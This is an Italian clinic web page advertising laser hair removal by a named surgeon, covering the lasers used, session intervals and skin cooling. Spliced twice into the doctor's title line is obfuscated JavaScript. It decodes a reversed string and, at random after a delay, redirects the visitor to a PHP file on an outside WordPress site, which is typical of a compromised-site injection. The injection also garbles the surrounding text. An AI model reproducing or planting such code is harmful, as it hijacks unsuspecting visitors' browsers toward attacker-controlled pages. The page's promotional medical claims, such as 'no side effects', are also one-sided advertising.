Depilazione Laser

Dott. Roberto Sannito, specialista in Chirurgia Generale
fo$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}to-dot$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tore

Laser utilizzati

Alessandrite gentlase new candela Boston Usa per pelli chiare.
Gentleyag candela Boston per pelle scura e abbronzata.

Sono sicuramente i sistemi laser più efficaci e rapidi oggi disponibili. Il numero delle sedute è sempre individuale ma già dalla prima seduta molte volte si notano grandi risultati. L'intervallo tra le sedute non è mai inferiore ad un mese ma dipende dalla zona trattata. Tutte le zone del corpo sono trattabili, non ci sono effetti collaterali a parte un lieve rossore e le complicanze sono assai improbabili. Questi laser non necessitano di gel o altre sostanze protettive sulla pelle in quanto un sistema denominato DCD provvede a spruzzare aria molto fredda sulla pelle un attimo prima dell'arrivo del calore del laser proteggendo la pelle e anestetizzandola. Non esporsi al sole durante il trattamento.

Avvertenze per i pazienti: gli esiti del trattamento possono variare caso per caso. Per maggiori informazioni e chiarimenti contattaci gratuitamente.